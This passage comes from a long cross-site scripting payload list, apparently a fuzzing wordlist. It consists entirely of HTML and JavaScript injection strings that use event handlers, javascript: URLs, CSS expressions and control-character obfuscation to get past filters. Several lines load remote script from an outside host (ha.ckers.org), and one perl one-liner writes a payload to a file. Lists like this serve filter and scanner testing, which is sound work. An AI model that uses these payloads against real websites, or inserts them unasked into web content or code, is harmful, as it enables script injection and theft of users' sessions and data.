SRC=\"jav&#x0A;ascript:alert('XSS');\">\n<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">\nperl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > out\n<IMG SRC=\" &#14;  javascript:alert('XSS');\">\n<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\n<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<<SCRIPT>alert(\"XSS\");//<</SCRIPT>\n<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >\n<SCRIPT SRC=//ha.ckers.org/.j>\n<IMG SRC=\"javascript:alert('XSS')\"\n<iframe src=http://ha.ckers.org/scriptlet.html <\n\\\";alert('XSS');//\n<plaintext>\nhttp://a/%%30%30\n<script\\x20type=\"text/javascript\">javascript:alert(1);</script>\n<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>\n<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>\n<script\\x09type=\"text/javascript\">javascript:alert(1);</script>\n<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>\n<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>\n<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>\n'`\"><\\x3Cscript>javascript:alert(1)</script>        \n'`\"><\\x00script>javascript:alert(1)</script>\n<img src=1 href=1 onerror=\"javascript:alert(1)\"></img>\n<audio src=1 href=1 onerror=\"javascript:alert(1)\"></audio>\n<video src=1 href=1 onerror=\"javascript:alert(1)\"></video>\n<body src=1 href=1 onerror=\"javascript:alert(1)\"></body>\n<image src=1 href=1 onerror=\"javascript:alert(1)\"></image>\n<object src=1 href=1 onerror=\"javascript:alert(1)\"></object>\n<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>\n<svg onResize svg onResize=\"javascript:javascript:alert(1)\"></svg onResize>\n<title onPropertyChange title onPropertyChange=\"javascript:javascript:alert(1)\"></title onPropertyChange>\n<iframe onLoad iframe onLoad=\"javascript:javascript:alert(1)\"></iframe onLoad>\n<body onMouseEnter body onMouseEnter=\"javascript:javascript:alert(1)\"></body onMouseEnter>\n<body onFocus body onFocus=\"javascript:javascript:alert(1)\"></body onFocus>\n<frameset onScroll frameset onScroll=\"javascript:javascript:alert(1)\"></frameset onScroll>\n<script onReadyStateChange script onReadyStateChange=\"javascript:javascript:alert(1)\"></script onReadyStateChange>\n<html onMouseUp html onMouseUp=\"javascript:javascript:alert(1)\"></html onMouseUp>\n<body onPropertyChange body onPropertyChange=\"javascript:javascript:alert(1)\"></body onPropertyChange>\n<svg onLoad svg onLoad=\"javascript:javascript:alert(1)\"></svg onLoad>\n<body onPageHide body onPageHide=\"javascript:javascript:alert(1)\"></body onPageHide>\n<body onMouseOver body onMouseOver=\"javascript:javascript:alert(1)\"></body onMouseOver>\n<body onUnload body onUnload=\"javascript:javascript:alert(1)\"></body onUnload>\n<body onLoad body onLoad=\"javascript:javascript:alert(1)\"></body onLoad>\n<bgsound onPropertyChange bgsound onPropertyChange=\"javascript:javascript:alert(1)\"></bgsound onPropertyChange>\n<html onMouseLeave html onMouseLeave=\"javascript:javascript:alert(1)\"></html onMouseLeave>\n<html onMouseWheel html onMouseWheel=\"javascript:javascript:alert(1)\"></html onMouseWheel>\n<style onLoad style onLoad=\"javascript:javascript:alert(1)\"></style onLoad>\n<iframe onReadyStateChange iframe onReadyStateChange=\"javascript:javascript:alert(1)\"></iframe onReadyStateChange>\n<body onPageShow body onPageShow=\"javascript:javascript:alert(1)\"></body onPageShow>\n<style onReadyStateChange style onReadyStateChange=\"javascript:javascript:alert(1)\"></style onReadyStateChange>\n<frameset onFocus frameset onFocus=\"javascript:javascript:alert(1)\"></frameset onFocus>\n<applet onError applet onError=\"javascript:javascript:alert(1)\"></applet onError>\n<marquee onStart marquee onStart=\"javascript:javascript:alert(1)\"></marquee onStart>\n<script onLoad script onLoad=\"javascript:javascript:alert(1)\"></script onLoad>\n<html onMouseOver html onMouseOver=\"javascript:javascript:alert(1)\"></html onMouseOver>\n<html onMouseEnter html onMouseEnter=\"javascript:parent.javascript:alert(1)\"></html onMouseEnter>\n<body onBeforeUnload body onBeforeUnload=\"javascript:javascript:alert(1)\"></body onBeforeUnload>\n<html onMouseDown html onMouseDown=\"javascript:javascript:alert(1)\"></html onMouseDown>\n<marquee onScroll marquee onScroll=\"javascript:javascript:alert(1)\"></marquee onScroll>\n<xml onPropertyChange xml onPropertyChange=\"javascript:javascript:alert(1)\"></xml onPropertyChange>\n<frameset onBlur frameset onBlur=\"javascript:javascript:alert(1)\"></frameset onBlur>\n<applet onReadyStateChange applet onReadyStateChange=\"javascript:javascript:alert(1)\"></applet onReadyStateChange>\n<svg onUnload svg onUnload=\"javascript:javascript:alert(1)\"></svg onUnload>\n<html onMouseOut html onMouseOut=\"javascript:javascript:alert(1)\"></html onMouseOut>\n<body onMouseMove body onMouseMove=\"javascript:javascript:alert(1)\"></body onMouseMove>\n<body onResize body onResize=\"javascript:javascript:alert(1)\"></body onResize>\n<object onError object onError=\"javascript:javascript:alert(1)\"></object onError>\n<body onPopState body onPopState=\"javascript:javascript:alert(1)\"></body onPopState>\n<html onMouseMove html onMouseMove=\"javascript:javascript:alert(1)\"></html onMouseMove>\n<applet onreadystatechange applet onreadystatechange=\"javascript:javascript:alert(1)\"></applet onreadystatechange>\n<body onpagehide body onpagehide=\"javascript:javascript:alert(1)\"></body onpagehide>\n<svg onunload svg onunload=\"javascript:javascript:alert(1)\"></svg onunload>\n<applet onerror applet onerror=\"javascript:javascript:alert(1)\"></applet onerror>\n<body onkeyup body onkeyup=\"javascript:javascript:alert(1)\"></body onkeyup>\n<body onunload body onunload=\"javascript:javascript:alert(1)\"></body onunload>\n<iframe onload iframe onload=\"javascript:javascript:alert(1)\"></iframe onload>\n<body onload body onload=\"javascript:javascript:alert(1)\"></body onload>\n<html onmouseover html onmouseover=\"javascript:javascript:alert(1)\"></html onmouseover>\n<object onbeforeload object onbeforeload=\"javascript:javascript:alert(1)\"></object onbeforeload>\n<body onbeforeunload body onbeforeunload=\"javascript:javascript:alert(1)\"></body onbeforeunload>\n<body onfocus body onfocus=\"javascript:javascript:alert(1)\"></body onfocus>\n<body onkeydown body onkeydown=\"javascript:javascript:alert(1)\"></body onkeydown>\n<iframe onbeforeload iframe onbeforeload=\"javascript:javascript:alert(1)\"></iframe onbeforeload>\n<iframe src iframe src=\"javascript:javascript:alert(1)\"></iframe src>\n<svg onload svg onload=\"javascript:javascript:alert(1)\"></svg onload>\n<html onmousemove html onmousemove=\"javascript:javascript:alert(1)\"></html onmousemove>\n<body onblur body onblur=\"javascript:javascript:alert(1)\"></body onblur>\n\\x3Cscript>javascript:alert(1)</script>\n'\"`><script>/* *\\x2Fjavascript:alert(1)// */</script>\n<script>javascript:alert(1)</script\\x0D\n<script>javascript:alert(1)</script\\x0A\n<script>javascript:alert(1)</script\\x0B\n<script charset=\"\\x22>javascript:alert(1)</script>\n<!--\\x3E<img src=xxx:x onerror=javascript:alert(1)> -->\n--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->\n--><!-- --\\x00> <img src=xxx:x onerror=javascript:alert(1)> -->\n--><!-- --\\x21> <img src=xxx:x onerror=javascript:alert(1)> -->\n--><!-- --\\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->\n`\"'><img src='#\\x27 onerror=javascript:alert(1)>\n<a href=\"javascript\\x3Ajavascript:alert(1)\" id=\"fuzzelement1\">test</a>\n\"'`><p><svg><script>a='hello\\x27;javascript:alert(1)//';</script></p>\n<a href=\"javas\\x00cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javas\\x07cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javas\\x0Dcript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javas\\x0Acript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javas\\x08cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javas\\x02cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javas\\x03cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javas\\x04cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javas\\x01cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javas\\x05cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javas\\x0Bcript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javas\\x09cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javas\\x06cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javas\\x0Ccript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<script>/* *\\x2A/javascript:alert(1)// */</script>\n<script>/* *\\x00/javascript:alert(1)// */</script>\n<style></style\\x3E<img src=\"about:blank\" onerror=javascript:alert(1)//></style>\n<style></style\\x0D<img src=\"about:blank\" onerror=javascript:alert(1)//></style>\n<style></style\\x09<img src=\"about:blank\" onerror=javascript:alert(1)//></style>\n<style></style\\x20<img src=\"about:blank\" onerror=javascript:alert(1)//></style>\n<style></style\\x0A<img src=\"about:blank\" onerror=javascript:alert(1)//></style>\n\"'`>ABC<div style=\"font-family:'foo'\\x7Dx:expression(javascript:alert(1);/*';\">DEF \n\"'`>ABC<div style=\"font-family:'foo'\\x3Bx:expression(javascript:alert(1);/*';\">DEF \n<script>if(\"x\\\\xE1\\x96\\x89\".length==2) { javascript:alert(1);}</script>\n<script>if(\"x\\\\xE0\\xB9\\x92\".length==2) { javascript:alert(1);}</script>\n<script>if(\"x\\\\xEE\\xA9\\x93\".length==2) { javascript:alert(1);}</script>\n'`\"><\\x3Cscript>javascript:alert(1)</script>\n'`\"><\\x00script>javascript:alert(1)</script>\n\"'`><\\x3Cimg src=xxx:x onerror=javascript:alert(1)>\n\"'`><\\x00img src=xxx:x onerror=javascript:alert(1)>\n<script src=\"data:text/plain\\x2Cjavascript:alert(1)\"></script>\n<script src=\"data:\\xD4\\x8F,javascript:alert(1)\"></script>\n<script src=\"data:\\xE0\\xA4\\x98,javascript:alert(1)\"></script>\n<script src=\"data:\\xCB\\x8F,javascript:alert(1)\"></script>\n<script\\x20type=\"text/javascript\">javascript:alert(1);</script>\n<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>\n<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>\n<script\\x09type=\"text/javascript\">javascript:alert(1);</script>\n<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>\n<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>\n<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>\nABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF\nABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF\nABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF\nABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF\n<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>\n\"`'><script>\\x3Bjavascript:alert(1)</script>\n\"`'><script>\\x0Djavascript:alert(1)</script>\n\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>\n\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>\n\"`'><script>\\x09javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>\n\"`'><script>\\x00javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>\n\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>\n\"`'><script>\\x0Cjavascript:alert(1)</script>\n\"`'><script>\\x2Bjavascript:alert(1)</script>\n\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>\n\"`'><script>-javascript:alert(1)</script>\n\"`'><script>\\x0Ajavascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>\n\"`'><script>\\x7Ejavascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>\n\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>\n\"`'><script>\\xC2\\x85javascript:alert(1)</script>\n\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>\n\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>\n\"`'><script>\\x21javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>\n\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>\n\"`'><script>\\x0Bjavascript:alert(1)</script>\n\"`'><script>\\x20javascript:alert(1)</script>\n\"`'><script>\\xC2\\xA0javascript:alert(1)</script>\n\"/><img/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x />\n\"/><img/onerror=\\x22javascript:alert(1)\\x22src=xxx:x />\n\"/><img/onerror=\\x09javascript:alert(1)\\x09src=xxx:x />\n\"/><img/onerror=\\x27javascript:alert(1)\\x27src=xxx:x />\n\"/><img/onerror=\\x0Ajavascript:alert(1)\\x0Asrc=xxx:x />\n\"/><img/onerror=\\x0Cjavascript:alert(1)\\x0Csrc=xxx:x />\n\"/><img/onerror=\\x0Djavascript:alert(1)\\x0Dsrc=xxx:x />\n\"/><img/onerror=\\x60javascript:alert(1)\\x60src=xxx:x />\n\"/><img/onerror=\\x20javascript:alert(1)\\x20src=xxx:x />\n<script\\x2F>javascript:alert(1)</script>\n<script\\x20>javascript:alert(1)</script>\n<script\\x0D>javascript:alert(1)</script>\n<script\\x0A>javascript:alert(1)</script>\n<script\\x0C>javascript:alert(1)</script>\n<script\\x00>javascript:alert(1)</script>\n<script\\x09>javascript:alert(1)</script>\n`\"'><img src=xxx:x onerror\\x0B=javascript:alert(1)>\n`\"'><img src=xxx:x onerror\\x00=javascript:alert(1)>\n`\"'><img src=xxx:x onerror\\x0C=javascript:alert(1)>\n`\"'><img src=xxx:x onerror\\x0D=javascript:alert(1)>\n`\"'><img src=xxx:x onerror\\x20=javascript:alert(1)>\n`\"'><img src=xxx:x onerror\\x0A=javascript:alert(1)>\n`\"'><img src=xxx:x onerror\\x09=javascript:alert(1)>\n<script>javascript:alert(1)<\\x00/script>\n<img src=# onerror\\x3D\"javascript:alert(1)\" >\n<input onfocus=javascript:alert(1) autofocus>\n<input onblur=javascript:alert(1) autofocus><input autofocus>\n<video poster=javascript:javascript:alert(1)//\n<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>\n<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X\n<video><source onerror=\"javascript:javascript:alert(1)\">\n<video onerror=\"javascript:javascript:alert(1)\"><source>\n<form><button formaction=\"javascript:javascript:alert(1)\">X\n<body oninput=javascript:alert(1)><input autofocus>\n<math href=\"javascript:javascript:alert(1)\">CLICKME</math>  <math> <maction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:javascript:alert(1)\">CLICKME</maction> </math>\n<frameset onload=javascript:alert(1)>\n<table background=\"javascript:javascript:alert(1)\">\n<!--<img src=\"--><img src=x onerror=javascript:alert(1)//\">\n<comment><img src=\"</comment><img src=x onerror=javascript:alert(1))//\">\n<![><img src=\"]><img src=x onerror=javascript:alert(1)//\">\n<style><img src=\"</style><img src=x onerror=javascript:alert(1)//\">\n<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>\n<head><base href=\"javascript://\"></head><body><a href=\"/. /,javascript:alert(1)//#\">XXX</a></body>\n<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>\n<OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\"><PARAM NAME=\"DataURL\" VALUE=\"javascript:alert(1)\"></OBJECT>\n<object data=\"data:text/html;base64,%(base64)s\">\n<embed src=\"data:text/html;base64,%(base64)s\">\n<b <script>alert(1)</script>0\n<div id=\"div1\"><input value=\"``onmouseover=javascript:alert(1)\"></div> <div id=\"div2\"></div><script>document.getElementById(\"div2\").innerHTML = document.getElementById(\"div1\").innerHTML;</script>\n<x '=\"foo\"><x foo='><img src=x onerror=javascript:alert(1)//'>\n<embed src=\"javascript:alert(1)\">\n<img src=\"javascript:alert(1)\">\n<image src=\"javascript:alert(1)\">\n<script src=\"javascript:alert(1)\">\n<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x\n<? foo=\"><script>javascript:alert(1)</script>\">\n<! foo=\"><script>javascript:alert(1)</script>\">\n</ foo=\"><script>javascript:alert(1)</script>\">\n<? foo=\"><x foo='?><script>javascript:alert(1)</script>'>\">\n<! foo=\"[[[Inception]]\"><x foo=\"]foo><script>javascript:alert(1)</script>\">\n<% foo><x foo=\"%><script>javascript:alert(1)</script>\">\n<div id=d><x xmlns=\"><iframe onload=javascript:alert(1)\"></div> <script>d.innerHTML=d.innerHTML</script>\n<img \\x00src=x onerror=\"alert(1)\">\n<img \\x47src=x onerror=\"javascript:alert(1)\">\n<img \\x11src=x onerror=\"javascript:alert(1)\">\n<img \\x12src=x onerror=\"javascript:alert(1)\">\n<img\\x47src=x onerror=\"javascript:alert(1)\">\n<img\\x10src=x onerror=\"javascript:alert(1)\">\n<img\\x13src=x onerror=\"javascript:alert(1)\">\n<img\\x32src=x onerror=\"javascript:alert(1)\">\n<img\\x47src=x onerror=\"javascript:alert(1)\">\n<img\\x11src=x onerror=\"javascript:alert(1)\">\n<img \\x47src=x onerror=\"javascript:alert(1)\">\n<img \\x34src=x onerror=\"javascript:alert(1)\">\n<img \\x39src=x onerror=\"javascript:alert(1)\">\n<img \\x00src=x onerror=\"javascript:alert(1)\">\n<img src\\x09=x onerror=\"javascript:alert(1)\">\n<img src\\x10=x onerror=\"javascript:alert(1)\">\n<img src\\x13=x onerror=\"javascript:alert(1)\">\n<img src\\x32=x onerror=\"javascript:alert(1)\">\n<img src\\x12=x onerror=\"javascript:alert(1)\">\n<img src\\x11=x onerror=\"javascript:alert(1)\">\n<img src\\x00=x onerror=\"javascript:alert(1)\">\n<img src\\x47=x onerror=\"javascript:alert(1)\">\n<img src=x\\x09onerror=\"javascript:alert(1)\">\n<img src=x\\x10onerror=\"javascript:alert(1)\">\n<img src=x\\x11onerror=\"javascript:alert(1)\">\n<img src=x\\x12onerror=\"javascript:alert(1)\">\n<img src=x\\x13onerror=\"javascript:alert(1)\">\n<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">\n<img src=x onerror=\\x09\"javascript:alert(1)\">\n<img src=x onerror=\\x10\"javascript:alert(1)\">\n<img src=x onerror=\\x11\"javascript:alert(1)\">\n<img src=x onerror=\\x12\"javascript:alert(1)\">\n<img src=x onerror=\\x32\"javascript:alert(1)\">\n<img src=x onerror=\\x00\"javascript:alert(1)\">\n<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>\n<img src=\"x` `<script>javascript:alert(1)</script>\"` `>\n<img src onerror /\" '\"= alt=javascript:alert(1)//\">\n<title onpropertychange=javascript:alert(1)></title><title title=>\n<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">\n<!--[if]><script>javascript:alert(1)</script -->\n<!--[if<img src=x onerror=javascript:alert(1)//]> -->\n<script src=\"/\\%(jscript)s\"></script>\n<script src=\"\\\\%(jscript)s\"></script>\n<object id=\"x\" classid=\"clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\"></object> <object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" onqt_error=\"javascript:alert(1)\" style=\"behavior:url(#x);\"><param name=postdomevents /></object>\n<a style=\"-o-link:'javascript:javascript:alert(1)';-o-link-source:current\">X\n<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>\n<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d\n<style>@import \"data:,*%7bx:expression(javascript:alert(1))%7D\";</style>\n<a style=\"pointer-events:none;position:absolute;\"><a style=\"position:absolute;\" onclick=\"javascript:alert(1);\">XXX</a></a><a href=\"javascript:javascript:alert(1)\">XXX</a>\n<style>*[{}@import'%(css)s?]</style>X\n<div style=\"font-family:'foo&#10;;color:red;';\">XXX\n<div style=\"font-family:foo}color=red;\">XXX\n<// style=x:expression\\28javascript:alert(1)\\29>\n<style>*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(1))}</style>\n<div style=content:url(%(svg)s)></div>\n<div style=\"list-style:url(http://foo.f)\\20url(javascript:javascript:alert(1));\">X\n<div id=d><div style=\"font-family:'sans\\27\\3B color\\3Ared\\3B'\">X</div></div> <script>with(document.getElementById(\"d\"))innerHTML=innerHTML</script>\n<div 